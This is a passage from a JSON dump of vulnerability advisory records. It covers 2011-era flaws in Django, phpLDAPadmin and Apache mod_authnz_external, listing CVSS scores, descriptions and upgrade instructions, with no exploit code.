arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2018-07-23T19:51:19", "type": "github", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2021-09-14T17:15:59", "id": "GHSA-H95J-H2RV-QRG4", "href": "https://github.com/advisories/GHSA-h95j-h2rv-qrg4", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T12:33:35", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2018-07-23T19:52:39", "type": "github", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2021-09-21T22:24:48", "id": "GHSA-X88J-93VC-WPMP", "href": "https://github.com/advisories/GHSA-x88j-93vc-wpmp", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-05-13T12:33:35", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2018-07-23T19:51:35", "type": "github", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2021-08-31T21:11:03", "id": "GHSA-3JQW-CRQJ-W8QW", "href": "https://github.com/advisories/GHSA-3jqw-crqj-w8qw", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in phpLDAPadmin query_engine\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2012-01-29T00:00:00", "type": "dsquare", "title": "phpLDAPadmin 1.2.1.1 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4075"], "modified": "2013-04-02T00:00:00", "id": "E-25", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-08-02T18:45:55", "description": "A remote code execution vulnerability has been reported in phpLDAPadmin web server.", "cvss3": {}, "published": "2013-10-13T00:00:00", "type": "checkpoint_advisories", "title": "PHP phpLDAPadmin Remote Code Execution (CVE-2011-4075)", 
"bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-4075"], "modified": "2022-08-02T00:00:00", "id": "CPAI-2013-2519", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2022-01-17T19:13:24", "description": "### Background\n\nmod_authnz_external is a tool for creating custom authentication backends for HTTP basic authentication. \n\n### Description\n\nmysql/mysql-auth.pl in mod_authnz_external does not properly sanitize input before using it in an SQL query. \n\n### Impact\n\nA remote attacker could exploit this vulnerability to inject arbitrary SQL statements by using a specially crafted username for HTTP authentication on a site using mod_authnz_external. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache mod_authnz_external users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-apache/mod_authnz_external-3.2.6\"", "cvss3": {}, "published": "2011-10-25T00:00:00", "type": "gentoo", "title": "Apache mod_authnz_external: SQL injection", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-10-25T00:00:00", "id": "GLSA-201110-23", "href": "https://security.gentoo.org/glsa/201110-23", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}